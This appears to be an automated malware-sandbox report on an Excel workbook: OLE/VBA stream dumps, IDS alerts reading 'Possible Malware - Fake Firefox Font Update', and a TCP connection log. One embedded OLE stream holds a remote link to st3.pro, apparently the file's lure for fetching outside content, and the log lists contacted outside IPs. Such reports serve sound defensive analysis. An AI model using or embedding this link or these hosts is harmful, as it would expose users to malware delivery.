                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8a af ec 4d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Attribute VB_Name = "Sheet3"
                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True
                                                                    

                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                    VBA File Name:ThisWorkbook.cls
                                                                    Stream Size:985
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0 .
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8a af f0 fd 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Attribute VB_Name = "ThisWorkbook"
                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True
                                                                    

                                                                    General
                                                                    Stream Path:\x1CompObj
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:114
                                                                    Entropy:4.25248375192737
                                                                    Base64 Encoded:True
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    General
                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:244
                                                                    Entropy:2.889430592781307
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                    General
                                                                    Stream Path:\x5SummaryInformation
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:200
                                                                    Entropy:3.3020681057018666
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . A } . . . . . . . . .
                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                    General
                                                                    Stream Path:MBD00B81574/\x1CompObj
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:99
                                                                    Entropy:3.631242196770981
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    General
                                                                    Stream Path:MBD00B81574/Package
                                                                    CLSID:
                                                                    File Type:Microsoft Excel 2007+
                                                                    Stream Size:1239304
                                                                    Entropy:7.996040299316133
                                                                    Base64 Encoded:True
                                                                    Data ASCII:P K . . . . . . . . . . ! . . 7 : . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c4 1b 37 3a d4 01 00 00 99 08 00 00 13 00 d4 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d0 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    General
                                                                    Stream Path:MBD00B81575/\x1Ole
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:370
                                                                    Entropy:4.705616048560759
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . ) [ X 6 ' ! l . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . t . 3 . . . p . r . o . / . 3 . v . y . H . q . s . 9 . ? . & . h . i . d . e . = . d . i . r . e . f . u . l . & . p . e . n . s . i . o . n . = . t . e . r . r . i . b . l . e . & . o . u . t . c . o . m . e . = . i . d . i . o . t . i . c . & . r . a . n . c . h . = . f . a . m . o . u . s . & . l . o . a . f . e . r . . . . . y . @ V k . . Q Z . X . / ; , [ . : w . . . . t 3 . . . . . . . . . . . .
                                                                    Data Raw:01 00 00 02 29 5b 9f 58 36 27 21 6c 00 00 00 00 00 00 00 00 00 00 00 00 ec 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b e8 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 74 00 33 00 2e 00 70 00 72 00 6f 00 2f 00 33 00 76 00 79 00 48 00 71 00 73 00 39 00 3f 00 26 00 68 00 69 00 64 00 65 00 3d 00 64 00 69 00 72 00 65 00 66 00 75 00 6c 00 26 00 70 00 65 00
                                                                    General
                                                                    Stream Path:Workbook
                                                                    CLSID:
                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                    Stream Size:44834
                                                                    Entropy:7.971786805639889
                                                                    Base64 Encoded:True
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . = N . . a . " . k . n . S [ | . v X . p c . . . . . . . . . . . t . . . \\ . p . w . . Z @ | . Z ! ' . B o ^ t ; N Z ] ( G W . . . G T & s T . w f G . 1 P ^ f ] q . . . . L @ . . " A . i h . . ? r = ( ' . B . . . < . a . . . x . . . = . . . . . l S = . . . . y } v ) 5 f . . . . . . . . . . { . . . . % . . . . d # . . . . . . . U = . . . S " a . . . _ E . w p @ . . . y . . . \\ " . . . . . . . . . . . . . . . . . 1 . . . . = Z F A + ( . # C [ 3 ' % } . Z
                                                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 3d d1 4e 15 8a ef 8d 85 61 00 ee 22 c9 04 cb 6b 08 91 f4 f4 6e ca 07 c9 f4 cb 53 5b 7c 0c ee 76 58 c9 fc 8a d9 e0 aa a7 bc 70 63 e8 b9 b3 a2 90 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 74 89 e2 00 00 00 5c 00 70 00 77 8a 02 10 c1 dd 5a ad c4 40 7c 0c 5a b0 21 27 0a 42 6f a4 5e 74 3b af a4 4e
                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                    CLSID:
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Stream Size:529
                                                                    Entropy:5.243204896800434
                                                                    Base64 Encoded:True
                                                                    Data ASCII:I D = " { 8 7 D 3 9 4 6 B - 9 5 4 D - 4 7 E 8 - A 1 8 6 - A E 2 8 B E 8 6 E 3 A D } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 7 9 5 9 0 A 7 F 0 D 9 2 F D D 2
                                                                    Data Raw:49 44 3d 22 7b 38 37 44 33 39 34 36 42 2d 39 35 34 44 2d 34 37 45 38 2d 41 31 38 36 2d 41 45 32 38 42 45 38 36 45 33 41 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:104
                                                                    Entropy:3.0488640812019017
                                                                    Base64 Encoded:False
                                                                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:2644
                                                                    Entropy:4.004781427604936
                                                                    Base64 Encoded:False
                                                                    Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                    Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:553
                                                                    Entropy:6.396371177390543
                                                                    Base64 Encoded:True
                                                                    Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                                                                    Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 92 b3 e7 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2025-03-12T18:35:50.560939+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970113.107.246.60443TCP
                                                                    2025-03-12T18:35:52.974397+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970513.107.246.60443TCP
                                                                    2025-03-12T18:35:52.998495+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970413.107.246.60443TCP
                                                                    2025-03-12T18:35:53.013712+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970313.107.246.60443TCP
                                                                    2025-03-12T18:36:02.706611+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970713.107.246.60443TCP
                                                                    2025-03-12T18:36:09.912110+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970913.107.246.60443TCP
                                                                    2025-03-12T18:36:09.983028+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74971013.107.246.60443TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Mar 12, 2025 18:35:29.172210932 CET49697443192.168.2.75.161.200.29
                                                                    Mar 12, 2025 18:35:29.172264099 CET443496975.161.200.29192.168.2.7
                                                                    Mar 12, 2025 18:35:29.172350883 CET49697443192.168.2.75.161.200.29
                                                                    Mar 12, 2025 18:35:29.172795057 CET49697443192.168.2.75.161.200.29
                                                                    Mar 12, 2025 18:35:29.172813892 CET443496975.161.200.29192.168.2.7
                                                                    Mar 12, 2025 18:35:30.850553989 CET443496975.161.200.29192.168.2.7
                                                                    Mar 12, 2025 18:35:30.850656033 CET49697443192.168.2.75.161.200.29
                                                                    Mar 12, 2025 18:35:30.856365919 CET49697443192.168.2.75.161.200.29
                                                                    Mar 12, 2025 18:35:30.856379032 CET443496975.161.200.29192.168.2.7
                                                                    Mar 12, 2025 18:35:30.856643915 CET443496975.161.200.29192.168.2.7
                                                                    Mar 12, 2025 18:35:30.856707096 CET49697443192.168.2.75.161.200.29
                                                                    Mar 12, 2025 18:35:30.857198954 CET49697443192.168.2.75.161.200.29
                                                                    Mar 12, 2025 18:35:30.904330969 CET443496975.161.200.29192.168.2.7
                                                                    Mar 12, 2025 18:35:31.321043015 CET443496975.161.200.29192.168.2.7
                                                                    Mar 12, 2025 18:35:31.321106911 CET49697443192.168.2.75.161.200.29
                                                                    Mar 12, 2025 18:35:31.321125984 CET443496975.161.200.29192.168.2.7
                                                                    Mar 12, 2025 18:35:31.321230888 CET49697443192.168.2.75.161.200.29
                                                                    Mar 12, 2025 18:35:31.388128996 CET443496975.161.200.29192.168.2.7
                                                                    Mar 12, 2025 18:35:31.388206959 CET443496975.161.200.29192.168.2.7
                                                                    Mar 12, 2025 18:35:31.388238907 CET49697443192.168.2.75.161.200.29
                                                                    Mar 12, 2025 18:35:31.388293028 CET49697443192.168.2.75.161.200.29
                                                                    Mar 12, 2025 18:35:31.425173998 CET49697443192.168.2.75.161.200.29
                                                                    Mar 12, 2025 18:35:31.425200939 CET443496975.161.200.29192.168.2.7
                                                                    Mar 12, 2025 18:35:31.425215960 CET49697443192.168.2.75.161.200.29
                                                                    Mar 12, 2025 18:35:31.425244093 CET49697443192.168.2.75.161.200.29
                                                                    Mar 12, 2025 18:35:31.493894100 CET49698443192.168.2.73.39.89.152
                                                                    Mar 12, 2025 18:35:31.493941069 CET443496983.39.89.152192.168.2.7
                                                                    Mar 12, 2025 18:35:31.494060040 CET49698443192.168.2.73.39.89.152
                                                                    Mar 12, 2025 18:35:31.494390011 CET49698443192.168.2.73.39.89.152
                                                                    Mar 12, 2025 18:35:31.494401932 CET443496983.39.89.152192.168.2.7
                                                                    Mar 12, 2025 18:35:34.133915901 CET443496983.39.89.152192.168.2.7
                                                                    Mar 12, 2025 18:35:34.133997917 CET49698443192.168.2.73.39.89.152
                                                                    Mar 12, 2025 18:35:34.138892889 CET49698443192.168.2.73.39.89.152
                                                                    Mar 12, 2025 18:35:34.138915062 CET443496983.39.89.152192.168.2.7
                                                                    Mar 12, 2025 18:35:34.139154911 CET443496983.39.89.152192.168.2.7
                                                                    Mar 12, 2025 18:35:34.139206886 CET49698443192.168.2.73.39.89.152
                                                                    Mar 12, 2025 18:35:34.139600992 CET49698443192.168.2.73.39.89.152
                                                                    Mar 12, 2025 18:35:34.184329033 CET443496983.39.89.152192.168.2.7
                                                                    Mar 12, 2025 18:35:34.732450008 CET443496983.39.89.152192.168.2.7
                                                                    Mar 12, 2025 18:35:34.732537031 CET49698443192.168.2.73.39.89.152
                                                                    Mar 12, 2025 18:35:34.732563019 CET443496983.39.89.152192.168.2.7
                                                                    Mar 12, 2025 18:35:34.732605934 CET49698443192.168.2.73.39.89.152
                                                                    Mar 12, 2025 18:35:34.736356974 CET49698443192.168.2.73.39.89.152
                                                                    Mar 12, 2025 18:35:34.736392021 CET443496983.39.89.152192.168.2.7
                                                                    Mar 12, 2025 18:35:34.736450911 CET49698443192.168.2.73.39.89.152
                                                                    Mar 12, 2025 18:35:34.737540007 CET4969980192.168.2.7104.168.7.38
                                                                    Mar 12, 2025 18:35:34.742250919 CET8049699104.168.7.38192.168.2.7
                                                                    Mar 12, 2025 18:35:34.742311954 CET4969980192.168.2.7104.168.7.38
                                                                    Mar 12, 2025 18:35:34.742419004 CET4969980192.168.2.7104.168.7.38
                                                                    Mar 12, 2025 18:35:34.747018099 CET8049699104.168.7.38192.168.2.7
                                                                    Mar 12, 2025 18:35:35.236979961 CET8049699104.168.7.38192.168.2.7
                                                                    Mar 12, 2025 18:35:35.237188101 CET4969980192.168.2.7104.168.7.38
                                                                    Mar 12, 2025 18:35:40.248254061 CET8049699104.168.7.38192.168.2.7
                                                                    Mar 12, 2025 18:35:40.248445034 CET4969980192.168.2.7104.168.7.38
                                                                    Mar 12, 2025 18:35:44.454125881 CET49701443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:44.454170942 CET4434970113.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:44.454653025 CET49701443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:44.454653025 CET49701443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:44.454684019 CET4434970113.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:50.560863018 CET4434970113.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:50.560939074 CET49701443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:50.565439939 CET49701443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:50.565459013 CET4434970113.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:50.565721035 CET4434970113.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:50.572536945 CET49701443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:50.616326094 CET4434970113.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:50.832442045 CET4434970113.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:50.832498074 CET4434970113.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:50.832624912 CET49701443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:50.832654953 CET49701443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:50.832668066 CET4434970113.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:50.844670057 CET49703443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:50.844715118 CET4434970313.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:50.845221996 CET49703443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:50.845371008 CET49703443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:50.845382929 CET4434970313.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:50.856827021 CET49704443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:50.856861115 CET4434970413.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:50.857086897 CET49704443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:50.857585907 CET49704443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:50.857594967 CET4434970413.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:50.861052990 CET49705443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:50.861080885 CET4434970513.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:50.861412048 CET49705443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:50.861572027 CET49705443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:50.861587048 CET4434970513.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:52.973722935 CET4434970513.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:52.974396944 CET49705443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:52.974411964 CET4434970513.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:52.975756884 CET49705443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:52.975769043 CET4434970513.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:52.996681929 CET4434970413.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:52.998495102 CET49704443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:52.998529911 CET4434970413.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.000096083 CET49704443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:53.000102043 CET4434970413.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.013106108 CET4434970313.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.013711929 CET49703443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:53.013721943 CET4434970313.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.014600039 CET49703443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:53.014605045 CET4434970313.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.508091927 CET4434970413.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.508167028 CET4434970413.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.508399010 CET49704443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:53.509224892 CET49704443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:53.509253979 CET4434970413.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.509268045 CET49704443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:53.509274006 CET4434970413.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.517594099 CET4434970313.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.517628908 CET4434970313.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.517683029 CET4434970313.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.517695904 CET49703443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:53.517733097 CET49703443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:53.517992973 CET49703443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:53.518014908 CET4434970313.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.518032074 CET49703443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:53.518038988 CET4434970313.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.609025955 CET4434970513.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.609108925 CET4434970513.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:35:53.609519005 CET49705443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:53.609519005 CET49705443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:53.609569073 CET49705443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:35:53.609591007 CET4434970513.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:00.373861074 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:00.373898029 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:00.373986006 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:00.374335051 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:00.374347925 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:02.706528902 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:02.706610918 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:02.708537102 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:02.708549023 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:02.708889961 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:02.710166931 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:02.752324104 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:03.345057011 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:03.345088959 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:03.345108986 CET4434970713.107.246.60192.168.2.7
